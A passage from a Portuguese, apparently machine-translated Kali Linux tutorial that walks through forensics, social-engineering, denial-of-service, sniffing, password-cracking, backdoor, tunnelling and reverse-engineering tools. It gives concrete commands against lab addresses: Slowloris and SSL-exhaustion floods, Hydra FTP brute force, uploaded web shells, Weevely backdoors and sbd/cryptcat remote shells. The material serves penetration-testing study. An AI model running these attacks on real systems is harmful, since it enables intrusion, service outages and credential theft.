texto para analisadores de PDF, no entanto, ele faz o trabalho. Geralmente, isso
é usado para arquivos pdf que você suspeita ter um script incorporado.
O comando é -
pdf-parser -o 10 filepath
onde "-o" é o número de objetos.

Como você pode ver na captura de tela a seguir, o arquivo pdf abre um comando
CMD.

Dumpzilla
O aplicativo Dumpzilla é desenvolvido no Python 3.x e tem como objetivo extrair
todas as informações forenses interessantes dos navegadores Firefox,
Iceweasel e Seamonkey a serem analisadas.

ddrescue

Ele copia dados de um arquivo ou dispositivo de bloco (disco rígido, cdrom etc.)
para outro, tentando resgatar as partes boas primeiro em caso de erros de
leitura.
A operação básica do ddrescue é totalmente automática. Ou seja, você não
precisa esperar por um erro, interromper o programa, reiniciá-lo de uma nova
posição, etc.
Se você usar o recurso mapfile do ddrescue, os dados serão resgatados com
muita eficiência (somente os blocos necessários serão lidos). Além disso, você
pode interromper o resgate a qualquer momento e retomar mais tarde no
mesmo ponto. O mapfile é uma parte essencial da eficácia do ddrescue. Use-o,
a menos que saiba o que está fazendo.
A linha de comando é -
dd_rescue infilepath outfilepath
O parâmetro "–v" significa detalhado. "/ dev / sdb" é a pasta a ser
resgatada. O arquivo img é a imagem recuperada.

DFF
É outra ferramenta forense usada para recuperar os arquivos. Também tem
uma interface gráfica. Para abri-lo, digite “dff-gui” no terminal e a seguinte GUI
da web será aberta.
Clique em Arquivo → "Abrir Evidência".

A tabela a seguir será aberta. Marque “Formato bruto” e clique em “+” para
selecionar a pasta que deseja recuperar.
Em seguida, você pode procurar os arquivos à esquerda do painel para ver o
que foi recuperado.

Linux Linux - Engenharia Social


Neste capítulo, aprenderemos sobre as ferramentas de engenharia social
usadas no Kali Linux.

Uso do Social Engineering Toolkit


O Social-Engineer Toolkit (SET) é uma estrutura de teste de penetração de
código aberto projetada para engenharia social. O SET possui vários vetores de
ataque personalizados que permitem fazer um ataque crível em uma fração de
tempo. Esse tipo de ferramenta usa comportamentos humanos para induzi-los
aos vetores de ataque.
Vamos aprender a usar o Social Engineer Toolkit.
Etapa 1 - Para abrir o SET, vá para Aplicativos → Ferramentas de engenharia
social → Clique em “SET” Ferramenta de engenharia social.
Etapa 2 - Ele perguntará se você concorda com os termos de
uso. Digite “y” como mostrado na captura de tela a seguir.

Etapa 3 - A maioria dos menus mostrados na captura de tela a seguir é auto-


explicativa e, dentre eles, o mais importante é o número 1 "Ataques de
engenharia social".
Etapa 4 - Digite "1" → Enter. Um submenu será aberto. Se você pressionar
o botão Enter novamente, verá as explicações para cada submenu.
O módulo Spear-phishing permite criar mensagens de email especialmente e
enviá-las às vítimas-alvo com cargas
úteis FileFormatmalicious anexadas . Por exemplo, o envio de documento
PDF malicioso que, se a vítima abrir, comprometerá o sistema. Se você deseja
falsificar seu endereço de e-mail, verifique se “Sendmail” está instalado (apt-get
install sendmail) e altere o sinalizador config / set_config SENDMAIL = OFF para
SENDMAIL = ON.
Existem duas opções para o ataque de spear phishing -

 Realizar um ataque em massa por email


 Criar uma carga útil FileFormat e um modelo de engenharia social
O primeiro é deixar o SET fazer tudo por você (opção 1), o segundo é criar sua
própria carga útil do FileFormat e usá-la em seu próprio ataque.
Digite "99" para voltar ao menu principal e digite "2" para ir para "Os vetores
de ataque na web".
O módulo de ataque na web é uma maneira única de utilizar vários ataques
baseados na web para comprometer a vítima pretendida. Este módulo é usado
executando ataques de phishing contra a vítima, se ela clicar no link. Existe uma
grande variedade de ataques que podem ocorrer quando eles clicam em um
link.
Digite "99" para retornar ao menu principal e digite "3" .
O infeccioso módulo USB / CD / DVD criará um arquivo autorun.inf e uma carga
útil do Metasploit. A carga útil e o arquivo de execução automática são gravados
ou copiados em um USB. Quando um DVD / USB / CD é inserido na máquina
da vítima, ele aciona um recurso de execução automática (se a execução
automática estiver ativada) e, comprometidamente, compromete o
sistema. Você pode escolher o vetor de ataque que deseja usar: erros de
formato de arquivo ou um executável direto.
A seguir, estão as opções para o Infectious Media Generator.

 Explorações no formato de arquivo


 Executável Metasploit Padrão

Digite "99" para voltar ao menu principal. Em seguida, digite "4" para ir para
"Os vetores de ataque da web".
A carga útil de criação e o ouvinte é uma maneira simples de criar uma carga
útil do Metasploit. Ele exportará o arquivo exe para você e gerará um
ouvinte. Você precisaria convencer a vítima a baixar o arquivo exe e executá-lo
para obter o shell.

Digite "99" para voltar ao menu principal e digite "5" para ir para "Os vetores
de ataque na web".

O ataque de mala direta permitirá que você envie vários emails para as vítimas
e personalize as mensagens. Existem duas opções no email em massa; o
primeiro é enviar um email para um único endereço de email. A segunda opção
permite importar uma lista com todos os emails de destinatários e enviará sua
mensagem para quantas pessoas você desejar nessa lista.

 Endereço de email único do ataque por email


 E-Mail Attack Mass Mailer
Digite "99" para voltar ao menu principal e digite "9" para ir para "Vetor de
ataque do PowerShell".

O módulo Vetor de ataque do Powershell permite criar ataques específicos do


PowerShell. Esses ataques permitem usar o PowerShell, que está disponível
por padrão em todos os sistemas operacionais Windows Vista e superior. O
PowerShell fornece um cenário frutífero para implantar cargas úteis e executar
funções que não são acionadas por tecnologias preventivas.

 Injetor Alfanumérico Shellcode da Powershell


 Powershell Reverse Shell
 Casco de Ligação do Powershell
 Banco de Dados SAM do Dump do PowerShell

Kali Linux - Ferramentas de estresse


As ferramentas de estresse são usadas para criar ataques de negação de
serviço ou para criar o teste de estresse para diferentes aplicativos, a fim de
tomar medidas apropriadas para o futuro.
Todas as ferramentas de teste de estresse são encontradas em Aplicativos →
02-Vulnerability Analysis → Stress testing.
Todo teste de teste de estresse será realizado em uma máquina que pode ser
explorada com IP 192.168.1.102

Slowhttptest
Slowhttptest é uma das ferramentas de ataque do DoS. Ele usa especialmente
o protocolo HTTP para conectar-se ao servidor e manter os recursos ocupados,
como CPU e RAM. Vamos ver em detalhes como usá-lo e explicar suas
funções.
Para abrir o slowhttptest, primeiro abra o terminal e digite “slowhttptest –
parameters” .
Você pode digitar “slowhttptest –h” para ver todos os parâmetros que você
precisa usar. Caso receba uma saída, 'Comando não encontrado', você deve
primeiro digitar “apt-get install slowhttptest” .
Depois da instalação, digite novamente slowhttptest –h

Digite o seguinte comando -


slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –
u
http://192.168.1.202/index.php -x 24 -p 2
Onde,
 (-c 500) = 500 conexões
 (-H) = modo Slowloris
 -g = Gerar estatísticas
 -o outputfile = Nome do arquivo de saída
 -i 10 = Use 10 segundos para aguardar dados
 -r 200 = 200 conexões com solicitações -t GET = GET
 -u http://192.168.1.202/index.php = URL de destino
 -x 24 = comprimento máximo de 24 bytes
 -p 2 = tempo limite de 2 segundos

Após o início do teste, a saída será mostrada na captura de tela a seguir, onde
você poderá observar que o serviço está disponível.
Depois de um tempo, na conexão 287, o serviço falha. Isso significa que o
servidor pode lidar com no máximo 287 conexões HTTP.

Inviteflood
Inviteflood é uma mensagem SIP / SDP INVITE inundando UDP / IP. Ele é
executado em uma variedade de distribuições Linux. Ele realiza ataques DoS
(Negação de Serviço) contra dispositivos SIP enviando várias solicitações
INVITE.
Para abrir o Inviteflood, primeiro abra o terminal e digite "inviteflood –
parameters"
Para obter ajuda, você pode usar "convidar inundação-h"

Em seguida, você pode usar o seguinte comando -


inviteflood eth0 target_extension target_domain target_ip
number_of_packets
Onde,
 target_extension é 2000
 target_domain é 192.168.xx
 target_ip é 192.168.xx
 number_of_packets é 1
 -a é o alias da conta SIP

Ixxflood
O Iaxflood é uma ferramenta de VoIP DoS. Para abri-lo, digite "iaxflood
sourcename destinationname numpackets" no terminal.
Para saber como usar, digite "iaxflood –h"

thc-ssl-dos
THC-SSL-DOS é uma ferramenta para verificar o desempenho do
SSL. Estabelecer uma conexão SSL segura requer 15x mais poder de
processamento no servidor do que no cliente. O THCSSL-DOS explora essa
propriedade assimétrica, sobrecarregando o servidor e eliminando-o da
Internet.
A seguir está o comando -
thc-ssl-dos victimIP httpsport –accept
Neste exemplo, será -
thc-ssl-dos 192.168.1.1 443 –accept
Sua saída seria a seguinte -
Kali Linux - Sniffing & Spoofing
O conceito básico das ferramentas de detecção é tão simples quanto as escutas
telefônicas e o Kali Linux possui algumas ferramentas populares para esse
fim. Neste capítulo, aprenderemos sobre as ferramentas de sniffing e spoofing
disponíveis no Kali.

Burpsuite
O Burpsuite pode ser usado como uma ferramenta de detecção entre o
navegador e os servidores da web para encontrar os parâmetros que o
aplicativo da web usa.
Para abrir o Burpsuite, vá para Aplicativos → Análise de Aplicativos da Web →
burpsuite.
Para fazer a configuração do sniffing, configuramos o burpsuite para se
comportar como um proxy. Para fazer isso, vá para Opções, como mostrado na
captura de tela a seguir. Marque a caixa como mostrado.
Nesse caso, o IP do proxy será 127.0.0.1 com porta 8080.
Em seguida, configure o proxy do navegador, que é o IP da máquina burpsuite
e a porta.
Para iniciar a interceptação, vá para Proxy → Interceptar → clique em "A
interceptação está ativada".
Continue navegando na página da Web em que deseja encontrar o parâmetro
para testar vulnerabilidades.
Nesse caso, é uma máquina metaploplo com IP 192.168.1.102

Vá para "Histórico HTTP". Na captura de tela a seguir, a linha marcada na seta


vermelha mostra a última solicitação. Em Raw e o parâmetro oculto, como o ID
da sessão e outros parâmetros, como nome de usuário e senha, foram
sublinhados em vermelho.

mitmproxi
mitmproxy é um proxy HTTP intermediário compatível com SSL. Ele fornece
uma interface de console que permite que os fluxos de tráfego sejam
inspecionados e editados em tempo real.
Para abri-lo, vá ao terminal e digite "mitmproxy -parameter" e, para obter
ajuda sobre os comandos, digite "mitmproxy -h" .

Para iniciar o mitmproxy, digite "mitmproxy –p portnumber" . Nesse caso, é


"mitmproxy –p 80".

Wireshark
O Wireshark é um dos melhores analisadores de pacotes de dados. Ele analisa
profundamente os pacotes no nível do quadro. Você pode obter mais
informações sobre o Wireshark na página
oficial: https://www.wireshark.org/ . Em Kali, é encontrado usando o seguinte
caminho - Aplicativos → Sniffing & Spoofing → wireshark.
Depois de clicar em wireshark, a seguinte GUI é aberta.
Clique em “Iniciar” e a captura de pacotes começará como mostrado na captura
de tela a seguir.
sslstrip
sslstrip é um ataque MITM que força o navegador da vítima a se comunicar em
texto sem formatação por HTTP, e os proxies modificam o conteúdo de um
servidor HTTPS. Para fazer isso, sslstrip está "removendo" os URLs https: // e
os transformando em URLs http: //.
Para abri-lo, vá para Aplicativos → 09-Sniffing & Spoofing → Spoofing e MITM
→ sslstrip.
Para configurá-lo, escreva para encaminhar toda a comunicação de 80 portas
para 8080.

Em seguida, inicie o comando sslstrip para a porta necessária.

Kali Linux - Ferramentas de quebra de senha


Neste capítulo, aprenderemos sobre as importantes ferramentas de quebra de
senha usadas no Kali Linux.

Hidra
O Hydra é um cracker de login que suporta muitos protocolos de ataque (Cisco
AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -FORM-GET, HTTP (S) -
FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD, HTTP-Proxy, ICQ, IMAP, IRC,
LDAP, MS-SQL, MySQL, NNTP, Ouvinte Oracle, Oracle SID, PC-Anywhere,
PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin , Rsh, SIP, SMB (NT), SMTP,
SMTP Enum, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 e v2), SSHKEY,
Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC e XMPP) .
Para abri-lo, vá para Aplicativos → Ataques com senha → Ataques on-line →
hydra.
Ele abrirá o console do terminal, conforme mostrado na captura de tela a seguir.

Nesse caso, forneceremos serviço FTP de força bruta de máquina


metaploploitável, que possui IP 192.168.1.101

Criamos no Kali uma lista de palavras com a extensão 'lst' no caminho usr \
share \ wordlist \ metasploit .
O comando será o seguinte -
hydra -l /usr/share/wordlists/metasploit/user -P
/usr/share/wordlists/metasploit/ passwords
ftp://192.168.1.101 –V
onde –V é o nome de usuário e a senha ao tentar

Conforme mostrado na captura de tela a seguir, são encontrados o nome de


usuário e a senha que são msfadmin: msfadmin

Johnny
Johnny é uma GUI da ferramenta de quebra de senha de John the
Ripper. Geralmente, é usado para senhas fracas.
Para abri-lo, vá para Aplicativos → Ataques por senha → johnny.
Nesse caso, obteremos a senha da máquina Kali com o seguinte comando e
um arquivo será criado na área de trabalho.

Clique em “Abrir arquivo passwd” → OK e todos os arquivos serão mostrados


como na captura de tela a seguir.
Clique em "Iniciar ataque".

Após a conclusão do ataque, clique no painel esquerdo em "Senhas" e a senha


não será sombreada.
John
john é uma versão de linha de comando do Johnny GUI. Para iniciá-lo, abra o
Terminal e digite "john" .

No caso de não mostrar a senha, precisamos escrever o seguinte comando -


root@kali:~# unshadow passwd shadow > unshadowed.txt

Rainbowcrack
O software RainbowCrack racha os hashes pela pesquisa da tabela do arco-
íris. As tabelas Rainbow são arquivos comuns armazenados no disco
rígido. Geralmente, as tabelas Rainbow são compradas on-line ou podem ser
compiladas com diferentes ferramentas.
Para abri-lo, vá para Aplicativos → Ataques por senha → clique em
“rainbowcrack”.

O comando para quebrar uma senha de hash é -


rcrack path_to_rainbow_tables -f path_to_password_hash

SQLdict
É uma ferramenta de ataque de dicionário para SQL Server e é muito fácil e
básica de ser usada. Para abri-lo, abra o terminal e digite "sqldict" . Ele abrirá
a seguinte visualização.
Em "Servidor IP de destino", digite o IP do servidor que contém o SQL. Em
"Conta de destino", digite o nome de usuário. Em seguida, carregue o arquivo
com a senha e clique em "Iniciar" até que ele termine.

identificador de hash
É uma ferramenta usada para identificar tipos de hashes, ou seja, para que
estão sendo usados. Por exemplo, se eu tiver um HASH, ele poderá me dizer
se é um HASH para Linux ou Windows.
A tela acima mostra que pode ser um hash MD5 e parece uma credencial em
cache do domínio.

Kali Linux - Mantendo o acesso


Neste capítulo, veremos as ferramentas que o Kali usa para manter a conexão
e o acesso a uma máquina invadida, mesmo quando ele se conectar e
desconectar novamente.

Powersploit
Esta é uma ferramenta que é para máquinas Windows. Possui o PowerShell
instalado na máquina das vítimas. Essa ferramenta ajuda o hacker a se
conectar à máquina da vítima via PowerShell.
Para abri-lo, abra o terminal à esquerda e digite o seguinte comando para entrar
na pasta powersploit -
cd /usr/share/powersploit/
Se você digitar “ls” , listará todas as ferramentas do PowerSpot que você pode
baixar e instalar na máquina da vítima depois de obter acesso. A maioria deles
é auto-explicada de acordo com seus nomes.
Uma maneira fácil de fazer o download dessa ferramenta na máquina da vítima
é criar um servidor da Web, que as ferramentas powersploit permitem criar
facilmente usando o seguinte comando -
python -m SimpleHTTPServer

Depois disso, se você digitar: http: // <endereço_ip da máquina Kali>: 8000 / a


seguir é o resultado.

Sbd
sbd é uma ferramenta semelhante ao Netcat. É portátil e pode ser usado em
máquinas Linux e Microsoft. O sbd possui criptografia AES-CBC-128 + HMAC-
SHA1> Basicamente, ajuda a conectar-se à máquina da vítima a qualquer
momento em uma porta específica e enviar comandos remotamente.
Para abri-lo, vá para o terminal e digite “sbd -l -p port” para o servidor aceitar
conexões.
Nesse caso, vamos colocar a porta 44 onde o servidor escutará.

No site da vítima, digite "sbd IPofserver port" . Uma conexão será


estabelecida onde podemos enviar os comandos remotos.
Nesse caso, é "localhost", pois realizamos o teste na mesma máquina.

Finalmente, no servidor, você verá que ocorreu uma conexão, como mostrado
na captura de tela a seguir.

Webshells
Os webshells podem ser usados para manter o acesso ou invadir um site. Mas
a maioria deles é detectada por antivírus. O shell php C99 é muito conhecido
entre os antivírus. Qualquer antivírus comum irá detectá-lo facilmente como um
malware.
Geralmente, sua principal função é enviar o comando do sistema via interfaces
da web.
Para abri-lo e digite “cd / usr / share / webshells /” no terminal.
Como você vê, eles são divididos em classes de acordo com a linguagem de
programação: asp, aspx, cfm, jsp, perl, php
Se você entrar na pasta PHP, poderá ver todas as conchas da Web para
páginas da Web em PHP.

Para fazer upload do shell para um servidor web, por exemplo, “simple-
backdoor.php”, abra a página da Web e o URL do shell da web.
No final, escreva o comando cmd. Você terá todas as informações mostradas
como na captura de tela a seguir.

Weevely
Weevely é um shell web PHP que simula uma conexão telnet. É uma ferramenta
para pós-exploração de aplicativos da Web e pode ser usada como um
backdoor furtivo ou como um shell da Web para gerenciar contas da Web
legítimas, mesmo hospedadas gratuitamente.
Para abri-lo, vá para o terminal e digite "weevely", onde você pode ver seu uso.
Para gerar o shell, digite "weevely generate password pathoffile" . Como
visto na captura de tela a seguir, ele é gerado na pasta “Desktop” e o arquivo
deve ser carregado em um servidor da web para obter acesso.

Após fazer o upload do shell da web, conforme mostrado na captura de tela a


seguir, podemos conectar-se ao cmd no servidor usando o comando “weevely
URL password”, onde é possível ver que uma sessão foi iniciada.
túnel http
O http-tunnel cria um fluxo de dados virtual bidirecional encapsulado em
solicitações HTTP. As solicitações podem ser enviadas via proxy HTTP, se
desejado. Isso pode ser útil para usuários atrás de firewalls restritivos. Se o
acesso à WWW for permitido por meio de um proxy HTTP, é possível usar o
túnel http e o telnet ou o PPP para conectar-se a um computador fora do firewall.
Primeiro, devemos criar um servidor de encapsulamento com o seguinte
comando -
httptunnel_server –h
Em seguida, no site do cliente, digite “httptunnel_client –h” e ambos
começarão a aceitar conexões.

dns2tcp
Esta é novamente uma ferramenta de encapsulamento que ajuda a passar o
tráfego TCP pelo tráfego DNS, o que significa porta UDP 53.
Para iniciá-lo, digite "dns2tcpd" . O uso é explicado quando você abrirá o
script.

No site do servidor, insira este comando para configurar o arquivo.


#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
No site do cliente, insira este comando.
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
O encapsulamento começará com este comando.

cryptcat
É outra ferramenta como o Netcat, que permite fazer a conexão TCP e UDP
com a máquina da vítima de maneira criptografada.
Para iniciar um servidor para escutar uma conexão, digite o seguinte comando
-
cryptcat –l –p port –n

Onde,
 -l significa ouvir uma conexão
 -p significa parâmetro do número da porta
 -n significa não fazer a resolução de nomes
No site do cliente, o comando de conexão é "cryptcat IPofServer
PortofServer"

Kali Linux - Engenharia Reversa


Neste capítulo, aprenderemos sobre as ferramentas de engenharia reversa do
Kali Linux.
OllyDbg
O OllyDbg é um depurador de nível de montador de 32 bits para aplicativos do
Microsoft Windows. A ênfase na análise de código binário o torna
particularmente útil nos casos em que a fonte está indisponível. Geralmente, é
usado para quebrar os softwares comerciais.
Para abri-lo, vá para Aplicativos → Engenharia Reversa → ollydbg

Para carregar um arquivo EXE, vá na “Pasta de abertura” na cor amarela,


mostrada em um quadrado vermelho na captura de tela acima.
Após o carregamento, você terá a seguinte exibição, onde poderá alterar os
binários.
dex2jar
Este é um aplicativo que ajuda a converter arquivos APK (android) em arquivos
JAR para visualizar o código fonte. Para usá-lo, abra o terminal e escreva “d2j-
dex2jar –d / local do arquivo” .
Nesse caso, o arquivo é "classes.dex" na área de trabalho.

A linha a seguir mostra que um arquivo JAR foi criado.


jd-gui
JD-GUI é um utilitário gráfico independente que exibe os códigos-fonte Java
dos arquivos “.class” . Você pode procurar o código fonte reconstruído. Nesse
caso, podemos reconstruir o arquivo que extraímos da ferramenta dex2jar.
Para iniciá-lo, abra o terminal e escreva “jd-gui” e a seguinte tela será aberta.

Para importar o arquivo, clique no ícone de pasta aberta no canto superior


esquerdo e importe o arquivo.
apktool
O Apktool é uma das melhores ferramentas para reverter todo o aplicativo
Android. Ele pode decodificar recursos para quase um formato original e
reconstruí-los após fazer modificações.
Para abri-lo, vá ao terminal e escreva "apktool" .
Para descompilar um arquivo apk, escreva "apktool d arquivo apk" .

A descompilação começará como mostrado na captura de tela a seguir.

Kali Linux - Ferramentas de Relatório


Neste capítulo, aprenderemos sobre algumas ferramentas de relatório no Kali
Linux.
drade
Em todo esse trabalho que realizamos, é importante compartilhar os resultados
que foram produzidos, acompanhar nosso trabalho etc. Para esse propósito, o
Kali possui uma ferramenta de relatório chamada dradis, que é um serviço da
web.
Etapa 1 - Para iniciar o Dradis, digite "service dradis start" .

Etapa 2 - Para abrir, vá para Aplicativos → Ferramentas de relatório → dradis.

O URL da web será aberto. Qualquer pessoa na LAN pode abri-lo no seguinte
URL https: // IP da máquina kali: 3004
Efetue login com o nome de usuário e a senha usados pela primeira vez.
Etapa 3 - Após o login, você pode importar arquivos do NMAP, NESSUS,
NEXPOSE. Para fazer isso, vá para “Importar do arquivo” → clique em “novo
importador (com feedback em tempo real)”.

Etapa 4 - Selecione o tipo de arquivo que você deseja enviar. Nesse caso, é
“Nessus scan” → clique em “Browse”.
Se você for para a página inicial agora, no painel esquerdo, verá que as
verificações importadas estão em uma pasta com os detalhes do host e da
porta.

Metagoofil
O Metagoofil realiza uma pesquisa no Google para identificar e baixar os
documentos no disco local e extrai os metadados. Extrai metadados de
documentos públicos pertencentes a uma empresa, indivíduo, objeto, etc.
específicos
Para abri-lo, vá para: "usr / share / metagoofil /" .
Para iniciar a pesquisa, digite o seguinte comando -
python metagoofil.py
Você pode usar os seguintes parâmetros com este comando -
 –D (nome de domínio)
 –T (tipo de arquivo para fazer download de dox, pdf etc.)
 –L (limite os resultados 10, 100)
 –N (limite de arquivos para download)
 –O (local para salvar os arquivos)
 –F (arquivo de saída)
O exemplo a seguir mostra apenas o nome do domínio está oculto.

Você também pode gostar